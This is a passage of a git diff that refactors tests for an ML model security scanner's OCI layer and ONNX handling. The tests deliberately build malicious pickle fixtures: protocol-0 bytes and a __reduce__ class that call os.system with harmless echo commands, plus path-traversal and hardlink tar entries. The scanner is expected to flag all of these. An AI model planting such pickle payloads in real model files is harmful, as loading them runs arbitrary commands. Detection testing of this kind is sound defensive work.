_assert_inconclusive_aggregate_not_cached( - path: Path, - expected_reason: str, - cache_dir: Path, - **scan_kwargs: Any, -) -> None: - reset_cache_manager() - try: - first = scan_model_directory_or_file( - str(path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - **scan_kwargs, - ) - second = scan_model_directory_or_file( - str(path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - **scan_kwargs, - ) - - for aggregate in (first, second): - metadata = aggregate.file_metadata[str(path)] - assert metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert expected_reason in metadata["scan_outcome_reasons"] - assert not [ - issue for issue in aggregate.issues if issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - ] - assert determine_exit_code(aggregate) == 2 - assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 - finally: - reset_cache_manager() - - -def _write_delayed_flax_cntk_overlap(path: Path) -> None: - prefix = b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab" - structure = b" CompositeFunction primitive_functions " - delayed_flax_root = flax_msgpack_scanner.msgpack.packb( - {"params": {"w": [1, 2, 3]}, "__reduce__": "attacker_callable"}, - use_bin_type=True, - ) - path.write_bytes(prefix + structure + (b"\xc0" * (FLAX_MSGPACK_STRUCTURE_READ_BYTES + 1)) + delayed_flax_root) - - class TestOciLayerScanner: """Comprehensive tests for OCI Layer Scanner.""" @@ -700,106 +666,61 @@ def test_scan_layer_dispatches_scannable_member_using_extracted_path(self, tmp_p def test_scan_layer_detects_extensionless_pickle_member(self, tmp_path: Path) -> None: """Extensionless pickle members should still be dispatched by content.""" - evil_pickle = Path(__file__).parent.parent / "assets/samples/pickles/evil.pickle" - - layer_path = tmp_path / "layer.tar.gz" - with tarfile.open(layer_path, "w:gz") as tar: - tar.add(evil_pickle, arcname="payload") - - manifest = {"layers": ["layer.tar.gz"]} - manifest_path = tmp_path / "extensionless.manifest" - manifest_path.write_text(json.dumps(manifest)) - - result = OciLayerScanner().scan(str(manifest_path)) - - assert result.success is False - assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) - assert any("extensionless.manifest:layer.tar.gz:payload" in (issue.location or "") for issue in result.issues) + _assert_extensionless_layer( + tmp_path, + ("layer.tar.gz"), + ("payload"), + ("layer.tar.gz"), + ("extensionless.manifest"), + ("extensionless.manifest:layer.tar.gz:payload"), + ) def test_scan_layer_detects_extensionless_protocol0_pickle_member_with_non_magic_prefix( self, tmp_path: Path, ) -> None: """Extensionless protocol-0 pickles should still be scanned when the first 64-byte probe is inconclusive.""" - protocol0_payload = tmp_path / "payload" - protocol0_payload.write_bytes(b"I1\n0cos\nsystem\n(S'echo oci-owned'\ntR.") - - layer_path = tmp_path / "layer.tar.gz" - with tarfile.open(layer_path, "w:gz") as tar: - tar.add(protocol0_payload, arcname="payload") - - manifest = {"layers": ["layer.tar.gz"]} - manifest_path = tmp_path / "extensionless-protocol0.manifest" - manifest_path.write_text(json.dumps(manifest)) - - result = OciLayerScanner().scan(str(manifest_path)) - - assert result.success is False - assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) - assert any( - "extensionless-protocol0.manifest:layer.tar.gz:payload" in (issue.location or "") for issue in result.issues + _assert_extensionless_protocol0_layer( + tmp_path, + ("payload"), + ("payload"), + ("extensionless-protocol0.manifest"), + ("extensionless-protocol0.manifest:layer.tar.gz:payload"), ) def test_scan_layer_detects_misnamed_pickle_member(self, tmp_path: Path) -> None: """Unsupported member suffixes should still be content-routed when payload bytes are model-like.""" - evil_pickle = Path(__file__).parent.parent / "assets/samples/pickles/evil.pickle" - - layer_path = tmp_path / "layer.tar.gz" - with tarfile.open(layer_path, "w:gz") as tar: - tar.add(evil_pickle, arcname="payload.jpg") - - manifest = {"layers": ["layer.tar.gz"]} - manifest_path = tmp_path / "misnamed.manifest" - manifest_path.write_text(json.dumps(manifest)) - - result = OciLayerScanner().scan(str(manifest_path)) - - assert result.success is False - assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) - assert any("misnamed.manifest:layer.tar.gz:payload.jpg" in (issue.location or "") for issue in result.issues) + _assert_extensionless_layer( + tmp_path, + ("layer.tar.gz"), + ("payload.jpg"), + ("layer.tar.gz"), + ("misnamed.manifest"), + ("misnamed.manifest:layer.tar.gz:payload.jpg"), + ) def test_scan_layer_detects_misnamed_protocol0_pickle_member_with_non_magic_prefix( self, tmp_path: Path, ) -> None: """Misnamed protocol-0 pickle members should still be scanned when the first probe bytes are inconclusive.""" - protocol0_payload = tmp_path / "payload.jpg" - protocol0_payload.write_bytes(b"I1\n0cos\nsystem\n(S'echo oci-owned'\ntR.") - - layer_path = tmp_path / "layer.tar.gz" - with tarfile.open(layer_path, "w:gz") as tar: - tar.add(protocol0_payload, arcname="payload.jpg") - - manifest = {"layers": ["layer.tar.gz"]} - manifest_path = tmp_path / "misnamed-protocol0.manifest" - manifest_path.write_text(json.dumps(manifest)) - - result = OciLayerScanner().scan(str(manifest_path)) - - assert result.success is False - assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) - assert any( - "misnamed-protocol0.manifest:layer.tar.gz:payload.jpg" in (issue.location or "") for issue in result.issues + _assert_extensionless_protocol0_layer( + tmp_path, + ("payload.jpg"), + ("payload.jpg"), + ("misnamed-protocol0.manifest"), + ("misnamed-protocol0.manifest:layer.tar.gz:payload.jpg"), ) def test_scan_manifest_normalizes_layer_refs_with_uppercase_and_trailing_space(self, tmp_path: Path) -> None: """Cosmetic layer-ref suffix changes should not hide a real .tar.gz payload.""" - evil_pickle = Path(__file__).parent.parent / "assets/samples/pickles/evil.pickle" - - layer_path = tmp_path / " UPPER.TAR.GZ " - with tarfile.open(layer_path, "w:gz") as tar: - tar.add(evil_pickle, arcname="malicious.pkl") - - manifest = {"layers": [" UPPER.TAR.GZ "]} - manifest_path = tmp_path / "uppercase.manifest" - manifest_path.write_text(json.dumps(manifest)) - - result = OciLayerScanner().scan(str(manifest_path)) - - assert result.success is False - assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) - assert any( - "uppercase.manifest: UPPER.TAR.GZ :malicious.pkl" in (issue.location or "") for issue in result.issues + _assert_extensionless_layer( + tmp_path, + (" UPPER.TAR.GZ "), + ("malicious.pkl"), + (" UPPER.TAR.GZ "), + ("uppercase.manifest"), + ("uppercase.manifest: UPPER.TAR.GZ :malicious.pkl"), ) def test_scan_manifest_resolves_exact_dotted_layer_ref(self, tmp_path: Path) -> None: @@ -831,22 +752,13 @@ def test_scan_manifest_resolves_exact_dotted_layer_ref(self, tmp_path: Path) -> def test_scan_layer_detects_member_with_trailing_space_extension(self, tmp_path: Path) -> None: """Trailing whitespace after a scannable extension should not bypass dispatch.""" - evil_pickle = Path(__file__).parent.parent / "assets/samples/pickles/evil.pickle" - - layer_path = tmp_path / "layer.tar.gz" - with tarfile.open(layer_path, "w:gz") as tar: - tar.add(evil_pickle, arcname="malicious.pkl ") - - manifest = {"layers": ["layer.tar.gz"]} - manifest_path = tmp_path / "trailing-space.manifest" - manifest_path.write_text(json.dumps(manifest)) - - result = OciLayerScanner().scan(str(manifest_path)) - - assert result.success is False - assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) - assert any( - "trailing-space.manifest:layer.tar.gz:malicious.pkl " in (issue.location or "") for issue in result.issues + _assert_extensionless_layer( + tmp_path, + ("layer.tar.gz"), + ("malicious.pkl "), + ("layer.tar.gz"), + ("trailing-space.manifest"), + ("trailing-space.manifest:layer.tar.gz:malicious.pkl "), ) def test_scan_layer_prefers_model_extension_over_trailing_generic_suffix(self, tmp_path: Path) -> None: @@ -2193,12 +2105,8 @@ def test_scan_layer_with_directory_entries(self, tmp_path): def test_scan_layer_reports_member_path_traversal_metadata(self, tmp_path: Path) -> None: """Unsafe member names must not suppress scanning of their safely extracted bytes.""" - class TraversalPayload: - def __reduce__(self) -> tuple[Any, tuple[str]]: - return (os.system, ("echo traversal-payload",)) - payload = tmp_path / "payload.pkl" - payload.write_bytes(pickle.dumps(TraversalPayload())) + payload.write_bytes(pickle.dumps(SystemCommandPayload("echo traversal-payload", lambda: os.system))) layer_path = tmp_path / "traversal.tar.gz" with tarfile.open(layer_path, "w:gz") as tar: @@ -2332,13 +2240,7 @@ def test_scan_layer_reports_absolute_hardlink_target(self, tmp_path: Path) -> No manifest_path = tmp_path / "absolute-hardlink.manifest" manifest_path.write_text(json.dumps({"layers": ["absolute-hardlink.tar.gz"]})) - result = OciLayerScanner().scan(str(manifest_path)) - - assert result.success is False - checks = [check for check in result.checks if check.name == "Symlink Safety Validation"] - assert len(checks) == 1 - assert checks[0].severity == IssueSeverity.CRITICAL - assert checks[0].details["target"] == "/bin/target" + _assert_unsafe_layer_link(manifest_path, "/bin/target") def test_scan_layer_allows_safe_link_metadata(self, tmp_path: Path) -> None: """Benign relative link metadata should remain clean.""" @@ -2519,26 +2421,7 @@ def test_resolve_link_payload_member_memoizes_long_chains( members_by_name[link.name] = link links.append(link) - resolve_calls = 0 - original_resolver = OciLayerScanner._resolve_link_target - - def counted_resolver( - target: str, - *, - resolved_member_name: str, - extraction_root: str, - is_symlink: bool, - ) -> tuple[str, bool]: - nonlocal resolve_calls - resolve_calls += 1 - return original_resolver( - target, - resolved_member_name=resolved_member_name, - extraction_root=extraction_root, - is_symlink=is_symlink, - ) - - monkeypatch.setattr(OciLayerScanner, "_resolve_link_target", staticmethod(counted_resolver)) + resolve_calls = _count_link_resolutions(monkeypatch) resolved_payload_cache: dict[tarfile.TarInfo, tarfile.TarInfo | None] = {} resolved_member_path_cache: dict[str, tarfile.TarInfo | None] = {} @@ -2553,7 +2436,7 @@ def counted_resolver( is payload ) - assert resolve_calls == chain_length + assert resolve_calls() == chain_length def test_resolve_link_payload_member_memoizes_component_symlink_chains( self, @@ -2579,26 +2462,7 @@ def test_resolve_link_payload_member_memoizes_component_symlink_chains( alias.linkname = "d0/payload.bin" aliases.append(alias) - resolve_calls = 0 - original_resolver = OciLayerScanner._resolve_link_target - - def counted_resolver( - target: str, - *, - resolved_member_name: str, - extraction_root: str, - is_symlink: bool, - ) -> tuple[str, bool]: - nonlocal resolve_calls - resolve_calls += 1 - return original_resolver( - target, - resolved_member_name=resolved_member_name, - extraction_root=extraction_root, - is_symlink=is_symlink, - ) - - monkeypatch.setattr(OciLayerScanner, "_resolve_link_target", staticmethod(counted_resolver)) + resolve_calls = _count_link_resolutions(monkeypatch) resolved_payload_cache: dict[tarfile.TarInfo, tarfile.TarInfo | None] = {} resolved_member_path_cache: dict[str, tarfile.TarInfo | None] = {} @@ -2613,7 +2477,7 @@ def counted_resolver( is payload ) - assert resolve_calls == chain_length + alias_count + assert resolve_calls() == chain_length + alias_count assert resolved_member_path_cache["d0/payload.bin"] is payload def test_resolve_link_payload_member_does_not_cache_suffix_specific_cycle(self) -> None: @@ -2851,12 +2715,7 @@ def test_scan_layer_does_not_reuse_cached_target_for_duplicate_link_names(self, manifest_path.write_text(json.dumps({"layers": [layer_path.name]})) routed_payloads: list[bytes] = [] - def record_scan(scan_path: str, _config: dict[str, Any]) -> ScanResult: - if scan_path.endswith(".onnx"): - routed_payloads.append(Path(scan_path).read_bytes()) - nested_result = ScanResult(scanner_name="unknown") - nested_result.finish() - return nested_result + record_scan = partial(_record_onnx_payloads, routed_payloads) with patch("modelaudit.core.scan_file", side_effect=record_scan): result = OciLayerScanner().scan(str(manifest_path)) @@ -2887,12 +2746,7 @@ def test_scan_layer_resolves_model_link_through_directory_symlink(self, tmp_path manifest_path.write_text(json.dumps({"layers": [layer_path.name]})) routed_payloads: list[bytes] = [] - def record_scan(scan_path: str, _config: dict[str, Any]) -> ScanResult: - if scan_path.endswith(".onnx"): - routed_payloads.append(Path(scan_path).read_bytes()) - nested_result = ScanResult(scanner_name="unknown") - nested_result.finish() - return nested_result + record_scan = partial(_record_onnx_payloads, routed_payloads) with patch("modelaudit.core.scan_file", side_effect=record_scan): result = OciLayerScanner().scan(str(manifest_path)) @@ -2918,13 +2772,8 @@ def test_scan_layer_deduplicates_equivalent_model_link_payloads(self, tmp_path: manifest_path = tmp_path / "duplicate-linked-model.manifest" manifest_path.write_text(json.dumps({"layers": [layer_path.name]})) - def clean_scan(_path: str, _config: dict[str, Any]) -> ScanResult: - nested_result = ScanResult(scanner_name="unknown") - nested_result.finish() - return nested_result - with ( - patch("modelaudit.core.scan_file", side_effect=clean_scan), + patch("modelaudit.core.scan_file", side_effect=_scan_clean_nested_member), patch("modelaudit.scanners.oci_layer_scanner.shutil.copyfileobj", wraps=shutil.copyfileobj) as mock_copy, ): result = OciLayerScanner().scan(str(manifest_path)) @@ -3046,13 +2895,7 @@ def test_scan_layer_reports_hardlink_target_traversal_from_layer_root(self, tmp_ manifest_path = tmp_path / "unsafe-hardlink.manifest" manifest_path.write_text(json.dumps({"layers": ["unsafe-hardlink.tar.gz"]})) - result = OciLayerScanner().scan(str(manifest_path)) - - assert result.success is False - checks = [check for check in result.checks if check.name == "Symlink Safety Validation"] - assert len(checks) == 1 - assert checks[0].severity == IssueSeverity.CRITICAL - assert checks[0].details["target"] == "../dir/model.bin" + _assert_unsafe_layer_link(manifest_path, "../dir/model.bin") def test_scan_layer_allows_safe_hardlink_target_from_layer_root(self, tmp_path: Path) -> None: """Benign hardlink targets under the archive root should remain clean.""" @@ -3107,12 +2950,7 @@ def test_scan_layer_reports_normalized_duplicate_paths_and_scans_both_members(se manifest_path = tmp_path / "duplicate.manifest" manifest_path.write_text(json.dumps({"layers": [layer_path.name]})) - def clean_scan(_path: str, _config: dict[str, Any]) -> ScanResult: - nested_result = ScanResult(scanner_name="unknown") - nested_result.finish() - return nested_result - - with patch("modelaudit.core.scan_file", side_effect=clean_scan) as mock_scan: + with patch("modelaudit.core.scan_file", side_effect=_scan_clean_nested_member) as mock_scan: result = OciLayerScanner().scan(str(manifest_path)) checks = [check for check in result.checks if check.name == "OCI Layer Metadata Validation"] @@ -3369,3 +3207,88 @@ def test_oci_layer_scanner_with_malicious_pickle(tmp_path: Path) -> None: assert result.success is False assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) + + +def _count_link_resolutions(monkeypatch: pytest.MonkeyPatch) -> Callable[[], int]: + resolve_calls = 0 + original_resolver = OciLayerScanner._resolve_link_target + + def counted_resolver( + target: str, + *, + resolved_member_name: str, + extraction_root: str, + is_symlink: bool, + ) -> tuple[str, bool]: + nonlocal resolve_calls + resolve_calls += 1 + return original_resolver( + target, + resolved_member_name=resolved_member_name, + extraction_root=extraction_root, + is_symlink=is_symlink, + ) + + monkeypatch.setattr(OciLayerScanner, "_resolve_link_target", staticmethod(counted_resolver)) + return lambda: resolve_calls + + +def _scan_clean_nested_member(_path: str, _config: dict[str, Any]) -> ScanResult: + nested_result = ScanResult(scanner_name="unknown") + nested_result.finish() + return nested_result + + +def _assert_extensionless_protocol0_layer( + tmp_path: Path, filename: str, member_name: str, manifest_name: str, expected_location: str +) -> None: + protocol0_payload = tmp_path / filename + protocol0_payload.write_bytes(b"I1\n0cos\nsystem\n(S'echo oci-owned'\ntR.") + + layer_path = tmp_path / "layer.tar.gz" + with tarfile.open(layer_path, "w:gz") as tar: + tar.add(protocol0_payload, arcname=member_name) + + manifest = {"layers": ["layer.tar.gz"]} + manifest_path = tmp_path / manifest_name + manifest_path.write_text(json.dumps(manifest)) + + result = OciLayerScanner().scan(str(manifest_path)) + + assert result.success is False + assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) + assert any(expected_location in (issue.location or "") for issue in result.issues) + + +def _assert_extensionless_layer( + tmp_path: Path, + layer_filename: str, + member_name: str, + manifest_layer: str, + manifest_filename: str, + expected_location: str, +) -> None: + evil_pickle = Path(__file__).parent.parent / "assets/samples/pickles/evil.pickle" + + layer_path = tmp_path / layer_filename + with tarfile.open(layer_path, "w:gz") as tar: + tar.add(evil_pickle, arcname=member_name) + + manifest = {"layers": [manifest_layer]} + manifest_path = tmp_path / manifest_filename + manifest_path.write_text(json.dumps(manifest)) + + result = OciLayerScanner().scan(str(manifest_path)) + + assert result.success is False + assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) + assert any(expected_location in (issue.location or "") for issue in result.issues) + + +def _assert_unsafe_layer_link(manifest_path: Path, expected_target: str) -> None: + result = OciLayerScanner().scan(str(manifest_path)) + assert result.success is False + checks = [check for check in result.checks if check.name == "Symlink Safety Validation"] + assert len(checks) == 1 + assert checks[0].severity == IssueSeverity.CRITICAL + assert checks[0].details["target"] == expected_target diff --git a/tests/scanners/test_onnx_scanner.py b/tests/scanners/test_onnx_scanner.py index 9d640f2ee..015c66ced 100644 --- a/tests/scanners/test_onnx_scanner.py +++ b/tests/scanners/test_onnx_scanner.py @@ -39,6 +39,8 @@ from modelaudit.utils.helpers.file_hash import compute_sha256_hash from modelaudit.utils.helpers.secure_hasher import compute_aggregate_hash from tests.helpers import is_huggingface_rate_limit_error +from tests.helpers.file_creators import _encode_protobuf_varint +from tests.helpers.file_creators import write_binary_fixture as _write_onnx_payload def _make_external_tensor(name: str, data_type: int, dims: list[int], external_path: str) -> Any: @@ -67,6 +69,18 @@ def assert_only_onnx_external_schema_validation_skipped(result: Any) -> None: assert result.success is False +def _checked_onnx_model(graph: onnx.GraphProto) -> onnx.ModelProto: + model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) + model.ir_version = 8 + onnx.checker.check_model(model) + return model + + +def _save_onnx_model(model: onnx.ModelProto, path: Path) -> Path: + onnx.save(model, str(path)) + return path + + def create_onnx_model( tmp_path: Path, *, @@ -131,9 +145,7 @@ def create_onnx_model( ) else: model = helper.make_model(graph) - path = tmp_path / "model.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "model.onnx") def create_onnx_weight_model( @@ -174,9 +186,7 @@ def create_onnx_weight_model( graph = helper.make_graph([node], "weighted_graph", [X], [Y], initializer=[weight_tensor]) model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) model.ir_version = 8 - path = tmp_path / filename - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / filename) def create_transformed_onnx_weight_model( @@ -264,12 +274,8 @@ def create_transformed_onnx_weight_model( [Y], initializer=initializers, ) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / f"{transform.lower()}-weight.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / f"{transform.lower()}-weight.onnx") def create_training_transformed_weight_model(tmp_path: Path, *, transform: str) -> Path: @@ -336,9 +342,7 @@ def create_training_transformed_weight_model(tmp_path: Path, *, transform: str) model.ir_version = 8 model.training_info.append(training_info) onnx.checker.check_model(model) - path = tmp_path / f"training-{transform.lower()}-weight.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / f"training-{transform.lower()}-weight.onnx") def create_nonweight_transformed_matmul_model(tmp_path: Path, *, transform: str) -> Path: @@ -367,12 +371,8 @@ def create_nonweight_transformed_matmul_model(tmp_path: Path, *, transform: str) raise ValueError(f"Unsupported transform: {transform}") graph = helper.make_graph(nodes, "nonweight_transform", graph_inputs, graph_outputs, initializer=initializers) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / f"nonweight-{transform.lower()}.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / f"nonweight-{transform.lower()}.onnx") def create_zipmap_classifier_model(tmp_path: Path) -> Path: @@ -400,9 +400,7 @@ def create_zipmap_classifier_model(tmp_path: Path) -> Path: ) model.ir_version = 8 onnx.checker.check_model(model) - path = tmp_path / "zipmap-classifier.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "zipmap-classifier.onnx") def create_training_info_weight_model(tmp_path: Path) -> Path: @@ -452,9 +450,7 @@ def create_training_info_weight_model(tmp_path: Path) -> Path: model.ir_version = 8 model.training_info.append(training_info) onnx.checker.check_model(model) - path = tmp_path / "training-info-weight.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "training-info-weight.onnx") def create_cross_training_info_weight_model(tmp_path: Path) -> Path: @@ -518,9 +514,7 @@ def create_cross_training_info_weight_model(tmp_path: Path) -> Path: model.ir_version = 8 model.training_info.extend([first_training_info, second_training_info]) onnx.checker.check_model(model) - path = tmp_path / "cross-training-info-weight.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "cross-training-info-weight.onnx") def create_training_initialization_reset_model(tmp_path: Path) -> Path: @@ -554,9 +548,7 @@ def create_training_initialization_reset_model(tmp_path: Path) -> Path: model.ir_version = 8 model.training_info.append(training_info) onnx.checker.check_model(model) - path = tmp_path / "training-initialization-reset.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "training-initialization-reset.onnx") def create_read_only_main_initializer_training_model(tmp_path: Path) -> Path: @@ -582,9 +574,7 @@ def create_read_only_main_initializer_training_model(tmp_path: Path) -> Path: model.ir_version = 8 model.training_info.append(training_info) onnx.checker.check_model(model) - path = tmp_path / "read-only-main-initializer-training.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "read-only-main-initializer-training.onnx") def create_non_weight_training_update_model( @@ -649,9 +639,7 @@ def create_non_weight_training_update_model( model.ir_version = 8 model.training_info.append(training_info) onnx.checker.check_model(model) - path = tmp_path / f"non-weight-{op_type.lower()}-training-update.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / f"non-weight-{op_type.lower()}-training-update.onnx") def create_flat_training_initialization_reset_model(tmp_path: Path) -> Path: @@ -689,9 +677,7 @@ def create_flat_training_initialization_reset_model(tmp_path: Path) -> Path: model.ir_version = 8 model.training_info.append(training_info) onnx.checker.check_model(model) - path = tmp_path / "flat-training-initialization-reset.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "flat-training-initialization-reset.onnx") def create_recurrent_weight_model( @@ -733,9 +719,7 @@ def create_recurrent_weight_model( model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 14)]) model.ir_version = 8 onnx.checker.check_model(model) - path = tmp_path / f"{op_type.lower()}-{target_input_index}-{distributed_near_match}.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / f"{op_type.lower()}-{target_input_index}-{distributed_near_match}.onnx") def create_broadcast_dynamic_weight_model(tmp_path: Path) -> Path: @@ -749,12 +733,8 @@ def create_broadcast_dynamic_weight_model(tmp_path: Path) -> Path: helper.make_node("MatMul", ["X", "W_view"], ["Y"], name="linear"), ] graph = helper.make_graph(nodes, "broadcast_dynamic_weight_graph", [X, delta], [Y], initializer=[vector]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "broadcast-dynamic-weight.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "broadcast-dynamic-weight.onnx") def create_computed_weight_model(tmp_path: Path) -> Path: @@ -768,12 +748,8 @@ def create_computed_weight_model(tmp_path: Path) -> Path: helper.make_node("MatMul", ["X", "W_view"], ["Y"], name="linear"), ] graph = helper.make_graph(nodes, "computed_weight_graph", [X], [Y], initializer=[left, right]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "computed-weight.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "computed-weight.onnx") def create_dynamic_left_weight_model(tmp_path: Path) -> Path: @@ -787,12 +763,8 @@ def create_dynamic_left_weight_model(tmp_path: Path) -> Path: helper.make_node("MatMul", ["W_view", "R"], ["Y"], name="linear"), ] graph = helper.make_graph(nodes, "dynamic_left_weight_graph", [delta], [Y], initializer=[left, right]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "dynamic-left-weight.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "dynamic-left-weight.onnx") def create_left_weight_stack_model(tmp_path: Path) -> Path: @@ -806,12 +778,8 @@ def create_left_weight_stack_model(tmp_path: Path) -> Path: helper.make_node("MatMul", ["W2", "hidden"], ["Y"], name="left_linear_2"), ] graph = helper.make_graph(nodes, "left_weight_stack", [X], [Y], initializer=[first, second]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "left-weight-stack.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "left-weight-stack.onnx") def create_left_weight_gemm_stack_model(tmp_path: Path) -> Path: @@ -825,12 +793,8 @@ def create_left_weight_gemm_stack_model(tmp_path: Path) -> Path: helper.make_node("Gemm", ["W2", "hidden"], ["Y"], name="left_gemm_2"), ] graph = helper.make_graph(nodes, "left_weight_gemm_stack", [X], [Y], initializer=[first, second]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "left-weight-gemm-stack.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "left-weight-gemm-stack.onnx") def create_attention_score_model(tmp_path: Path) -> Path: @@ -856,12 +820,8 @@ def create_attention_score_model(tmp_path: Path) -> Path: [Y], initializer=[query_weight, key_weight, value_weight], ) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "attention-score.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "attention-score.onnx") def create_einsum_attention_score_model(tmp_path: Path) -> Path: @@ -882,12 +842,8 @@ def create_einsum_attention_score_model(tmp_path: Path) -> Path: [scores], initializer=[query_weight, key_weight], ) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "einsum-attention-score.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "einsum-attention-score.onnx") def create_recurrent_dynamic_weight_model(tmp_path: Path) -> Path: @@ -914,9 +870,7 @@ def create_recurrent_dynamic_weight_model(tmp_path: Path) -> Path: model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 14)]) model.ir_version = 8 onnx.checker.check_model(model) - path = tmp_path / "recurrent-dynamic-weight.onnx" - onnx.save(model, str(path)) - return path + return _save_onnx_model(model, tmp_path / "recurrent-dynamic-weight.onnx") def create_projected_dynamic_matmul_weight_model(tmp_path: Path, *, left: bool) -> Path: @@ -939,12 +893,8 @@ def create_projected_dynamic_matmul_weight_model(tmp_path: Path, *, left: bool) helper.make_node("MatMul", linear_inputs, ["Y"], name="linear"), ] graph = helper.make_graph(nodes, "projected_dynamic_weight_graph", [seed, X], [Y], initializer=[projection]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / f"projected-dynamic-matmul-weight-{left}.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / f"projected-dynamic-matmul-weight-{left}.onnx") def create_mixed_activation_and_raw_lineage_model(tmp_path: Path) -> Path: @@ -967,12 +917,8 @@ def create_mixed_activation_and_raw_lineage_model(tmp_path: Path) -> Path: [Y], initializer=[shared_weight, output_weight], ) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "mixed-activation-raw-lineage.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "mixed-activation-raw-lineage.onnx") def create_batched_matmul_weight_model(tmp_path: Path, weights: np.ndarray, *, left: bool) -> Path: @@ -988,12 +934,8 @@ def create_batched_matmul_weight_model(tmp_path: Path, weights: np.ndarray, *, l node_inputs = ["input", "W"] node = helper.make_node("MatMul", node_inputs, ["output"], name="batched_linear") graph = helper.make_graph([node], "batched_matmul_graph", [X], [Y], initializer=[weight_tensor]) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / ("batched-left-matmul.onnx" if left else "batched-right-matmul.onnx") - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / ("batched-left-matmul.onnx" if left else "batched-right-matmul.onnx")) def create_collision_named_weight_model(tmp_path: Path) -> Path: @@ -1031,12 +973,8 @@ def create_collision_named_weight_model(tmp_path: Path) -> Path: ), ] graph = helper.make_graph(nodes, "collision_graph", [right_input, left_input], outputs, initializer=initializers) - model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)]) - model.ir_version = 8 - onnx.checker.check_model(model) - path = tmp_path / "collision-named-weights.onnx" - onnx.save(model, str(path)) - return path + model = _checked_onnx_model(graph) + return _save_onnx_model(model, tmp_path / "collision-named-weights.onnx") def create_many_consumer_weight_model(tmp_path: Path, *, consumer_count: int) -> Path: @@ -1058,12 +996,8 @@ def create_many_consumer_weight_model(tmp_path: Path, *, consumer_count: int) -> for index, output_name in 